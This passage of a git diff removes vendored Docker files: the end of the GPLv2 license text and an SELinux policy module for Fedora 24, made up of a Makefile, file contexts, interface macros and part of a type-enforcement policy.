-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License along
-    with this program; if not, write to the Free Software Foundation, Inc.,
-    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
deleted file mode 100644
index 16df33ef32..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
+++ /dev/null
@@ -1,23 +0,0 @@
-TARGETS?=docker
-MODULES?=${TARGETS:=.pp.bz2}
-SHAREDIR?=/usr/share
-
-all: ${TARGETS:=.pp.bz2}
-
-%.pp.bz2: %.pp
-	@echo Compressing $^ -\> $@
-	bzip2 -9 $^
-
-%.pp: %.te
-	make -f ${SHAREDIR}/selinux/devel/Makefile $@
-
-clean:
-	rm -f *~  *.tc *.pp *.pp.bz2
-	rm -rf tmp *.tar.gz
-
-man: install
-	sepolicy manpage --domain ${TARGETS}_t
-
-install:
-	semodule -i ${TARGETS}
-
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
deleted file mode 100644
index 7ea3117a89..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
+++ /dev/null
@@ -1 +0,0 @@
-SELinux policy for docker
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
deleted file mode 100644
index d6cb0e5792..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
+++ /dev/null
@@ -1,29 +0,0 @@
-/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
-
-/usr/bin/docker			--	gen_context(system_u:object_r:docker_exec_t,s0)
-/usr/bin/docker-novolume-plugin		--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
-/usr/lib/docker/docker-novolume-plugin	--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
-
-/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
-/usr/lib/systemd/system/docker-novolume-plugin.service	--	gen_context(system_u:object_r:docker_unit_file_t,s0)
-
-/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
-
-/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
-/var/lib/kublet(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
-/var/lib/docker/vfs(/.*)?	gen_context(system_u:object_r:svirt_sandbox_file_t,s0)
-
-/var/run/docker(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
-/var/run/docker/plugins(/.*)?		gen_context(system_u:object_r:docker_plugin_var_run_t,s0)
-
-/var/lock/lxc(/.*)?		gen_context(system_u:object_r:docker_lock_t,s0)
-
-/var/log/lxc(/.*)?		gen_context(system_u:object_r:docker_log_t,s0)
-
-/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
-/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
deleted file mode 100644
index e087e8b98b..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
+++ /dev/null
@@ -1,523 +0,0 @@
-
-## <summary>The open-source application container engine.</summary>
-
-########################################
-## <summary>
-##	Execute docker in the docker domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_domtrans',`
-	gen_require(`
-		type docker_t, docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	domtrans_pattern($1, docker_exec_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Execute docker in the caller domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_exec',`
-	gen_require(`
-		type docker_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	can_exec($1, docker_exec_t)
-')
-
-########################################
-## <summary>
-##	Search docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_search_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	files_search_var_lib($1)
-')
-
-########################################
-## <summary>
-##	Execute docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_exec_lib',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	allow $1 docker_var_lib_t:dir search_dir_perms;
-	can_exec($1, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Read docker share files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_share_files',`
-	gen_require(`
-		type docker_share_t;
-	')
-
-	files_search_var_lib($1)
-	list_dirs_pattern($1, docker_share_t, docker_share_t)
-	read_files_pattern($1, docker_share_t, docker_share_t)
-	read_lnk_files_pattern($1, docker_share_t, docker_share_t)
-')
-
-######################################
-## <summary>
-##	Allow the specified domain to execute apache
-##	in the caller domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`apache_exec',`
-	gen_require(`
-		type httpd_exec_t;
-	')
-
-	can_exec($1, httpd_exec_t)
-')
-
-######################################
-## <summary>
-##	Allow the specified domain to execute docker shared files
-##	in the caller domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_exec_share_files',`
-	gen_require(`
-		type docker_share_t;
-	')
-
-	can_exec($1, docker_share_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_files',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Manage docker lib directories.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_manage_lib_dirs',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	files_search_var_lib($1)
-	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
-')
-
-########################################
-## <summary>
-##	Create objects in a docker var lib directory
-##	with an automatic type transition to
-##	a specified private type.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-## <param name="private_type">
-##	<summary>
-##	The type of the object to create.
-##	</summary>
-## </param>
-## <param name="object_class">
-##	<summary>
-##	The class of the object to be created.
-##	</summary>
-## </param>
-## <param name="name" optional="true">
-##	<summary>
-##	The name of the object being created.
-##	</summary>
-## </param>
-#
-interface(`docker_lib_filetrans',`
-	gen_require(`
-		type docker_var_lib_t;
-	')
-
-	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
-')
-
-########################################
-## <summary>
-##	Read docker PID files.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_read_pid_files',`
-	gen_require(`
-		type docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
-')
-
-########################################
-## <summary>
-##	Execute docker server in the docker domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed to transition.
-##	</summary>
-## </param>
-#
-interface(`docker_systemctl',`
-	gen_require(`
-		type docker_t;
-		type docker_unit_file_t;
-	')
-
-	systemd_exec_systemctl($1)
-	init_reload_services($1)
-        systemd_read_fifo_file_passwd_run($1)
-	allow $1 docker_unit_file_t:file read_file_perms;
-	allow $1 docker_unit_file_t:service manage_service_perms;
-
-	ps_process_pattern($1, docker_t)
-')
-
-########################################
-## <summary>
-##	Read and write docker shared memory.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_rw_sem',`
-	gen_require(`
-		type docker_t;
-	')
-
-	allow $1 docker_t:sem rw_sem_perms;
-')
-
-#######################################
-## <summary>
-##  Read and write the docker pty type.
-## </summary>
-## <param name="domain">
-##  <summary>
-##  Domain allowed access.
-##  </summary>
-## </param>
-#
-interface(`docker_use_ptys',`
-    gen_require(`
-        type docker_devpts_t;
-    ')
-
-    allow $1 docker_devpts_t:chr_file rw_term_perms;
-')
-
-#######################################
-## <summary>
-##      Allow domain to create docker content
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`docker_filetrans_named_content',`
-
-    gen_require(`
-        type docker_var_lib_t;
-        type docker_share_t;
-    	type docker_log_t;
-	    type docker_var_run_t;
-        type docker_home_t;
-    ')
-
-    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
-    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
-    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
-    logging_log_filetrans($1, docker_log_t, dir, "lxc")
-    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
-    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
-')
-
-########################################
-## <summary>
-##	Connect to docker over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_stream_connect',`
-	gen_require(`
-		type docker_t, docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Connect to SPC containers over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_spc_stream_connect',`
-	gen_require(`
-		type spc_t, spc_var_run_t;
-	')
-
-	files_search_pids($1)
-	files_write_all_pid_sockets($1)
-	allow $1 spc_t:unix_stream_socket connectto;
-')
-
-########################################
-## <summary>
-##	All of the rules required to administrate
-##	an docker environment
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_admin',`
-	gen_require(`
-		type docker_t;
-		type docker_var_lib_t, docker_var_run_t;
-		type docker_unit_file_t;
-		type docker_lock_t;
-		type docker_log_t;
-		type docker_config_t;
-	')
-
-	allow $1 docker_t:process { ptrace signal_perms };
-	ps_process_pattern($1, docker_t)
-
-	admin_pattern($1, docker_config_t)
-
-	files_search_var_lib($1)
-	admin_pattern($1, docker_var_lib_t)
-
-	files_search_pids($1)
-	admin_pattern($1, docker_var_run_t)
-
-	files_search_locks($1)
-	admin_pattern($1, docker_lock_t)
-
-	logging_search_logs($1)
-	admin_pattern($1, docker_log_t)
-
-	docker_systemctl($1)
-	admin_pattern($1, docker_unit_file_t)
-	allow $1 docker_unit_file_t:service all_service_perms;
-
-	optional_policy(`
-		systemd_passwd_agent_exec($1)
-		systemd_read_fifo_file_passwd_run($1)
-	')
-')
-
-########################################
-## <summary>
-##	Execute docker_auth_exec_t in the docker_auth domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_auth_domtrans',`
-	gen_require(`
-		type docker_auth_t, docker_auth_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	domtrans_pattern($1, docker_auth_exec_t, docker_auth_t)
-')
-
-######################################
-## <summary>
-##	Execute docker_auth in the caller domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_auth_exec',`
-	gen_require(`
-		type docker_auth_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	can_exec($1, docker_auth_exec_t)
-')
-
-########################################
-## <summary>
-##	Connect to docker_auth over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_auth_stream_connect',`
-	gen_require(`
-		type docker_auth_t, docker_plugin_var_run_t;
-	')
-
-	files_search_pids($1)
-	stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t)
-')
-
-########################################
-## <summary>
-##	docker domain typebounds calling domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain to be typebound.
-## </summary>
-## </param>
-#
-interface(`docker_typebounds',`
-	gen_require(`
-		type docker_t;
-	')
-
-	typebounds docker_t $1;
-')
-
-########################################
-## <summary>
-##	Allow any docker_exec_t to be an entrypoint of this domain
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-## <rolecap/>
-#
-interface(`docker_entrypoint',`
-	gen_require(`
-		type docker_exec_t;
-	')
-	allow $1 docker_exec_t:file entrypoint;
-')
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
deleted file mode 100644
index 4231688382..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
+++ /dev/null
@@ -1,399 +0,0 @@
-policy_module(docker, 1.0.0)
-
-########################################
-#
-# Declarations
-#
-
-## <desc>
-##  <p>
-##  Determine whether docker can
-##  connect to all TCP ports.
-##  </p>
-## </desc>
-gen_tunable(docker_connect_any, false)
-
-type docker_t;
-type docker_exec_t;
-init_daemon_domain(docker_t, docker_exec_t)
-domain_subj_id_change_exemption(docker_t)
-domain_role_change_exemption(docker_t)
-
-type spc_t;
-domain_type(spc_t)
-role system_r types spc_t;
-
-type docker_auth_t;
-type docker_auth_exec_t;
-init_daemon_domain(docker_auth_t, docker_auth_exec_t)
-
-type spc_var_run_t;
-files_pid_file(spc_var_run_t)
-
-type docker_var_lib_t;
-files_type(docker_var_lib_t)
-
-type docker_home_t;
-userdom_user_home_content(docker_home_t)
-
-type docker_config_t;
-files_config_file(docker_config_t)
-
-type docker_lock_t;
-files_lock_file(docker_lock_t)
-
-type docker_log_t;
-logging_log_file(docker_log_t)
-
-type docker_tmp_t;
-files_tmp_file(docker_tmp_t)
-
-type docker_tmpfs_t;
-files_tmpfs_file(docker_tmpfs_t)
-
-type docker_var_run_t;
-files_pid_file(docker_var_run_t)
-
-type docker_plugin_var_run_t;
-files_pid_file(docker_plugin_var_run_t)
-
-type docker_unit_file_t;
-systemd_unit_file(docker_unit_file_t)
-
-type docker_devpts_t;
-term_pty(docker_devpts_t)
-
-type docker_share_t;
-files_type(docker_share_t)
-
-########################################
-#
-# docker local policy
-#
-allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
-allow docker_t self:tun_socket relabelto;
-allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
-allow docker_t self:fifo_file rw_fifo_file_perms;
-allow docker_t self:unix_stream_socket create_stream_socket_perms;
-allow docker_t self:tcp_socket create_stream_socket_perms;
-allow docker_t self:udp_socket create_socket_perms;
-allow docker_t self:capability2 block_suspend;
-
-docker_auth_stream_connect(docker_t)
-
-manage_files_pattern(docker_t, docker_home_t, docker_home_t)
-manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
-manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
-userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
-
-manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
-manage_files_pattern(docker_t, docker_config_t, docker_config_t)
-files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
-
-manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
-manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
-files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc")
-
-manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
-manage_files_pattern(docker_t, docker_log_t, docker_log_t)
-manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
-logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
-allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
-
-manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-allow docker_t docker_tmpfs_t:dir relabelfrom;
-can_exec(docker_t, docker_tmpfs_t)
-fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
-allow docker_t docker_tmpfs_t:chr_file mounton;
-
-manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
-manage_files_pattern(docker_t, docker_share_t, docker_share_t)
-manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
-allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
-
-can_exec(docker_t, docker_share_t)
-#docker_filetrans_named_content(docker_t)
-
-manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
-files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
-
-allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
-term_create_pty(docker_t, docker_devpts_t)
-
-kernel_read_system_state(docker_t)
-kernel_read_network_state(docker_t)
-kernel_read_all_sysctls(docker_t)
-kernel_rw_net_sysctls(docker_t)
-kernel_setsched(docker_t)
-kernel_read_all_proc(docker_t)
-
-domain_use_interactive_fds(docker_t)
-domain_dontaudit_read_all_domains_state(docker_t)
-
-corecmd_exec_bin(docker_t)
-corecmd_exec_shell(docker_t)
-
-corenet_tcp_bind_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_if(docker_t)
-corenet_tcp_sendrecv_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_port(docker_t)
-corenet_tcp_bind_all_ports(docker_t)
-corenet_tcp_connect_http_port(docker_t)
-corenet_tcp_connect_commplex_main_port(docker_t)
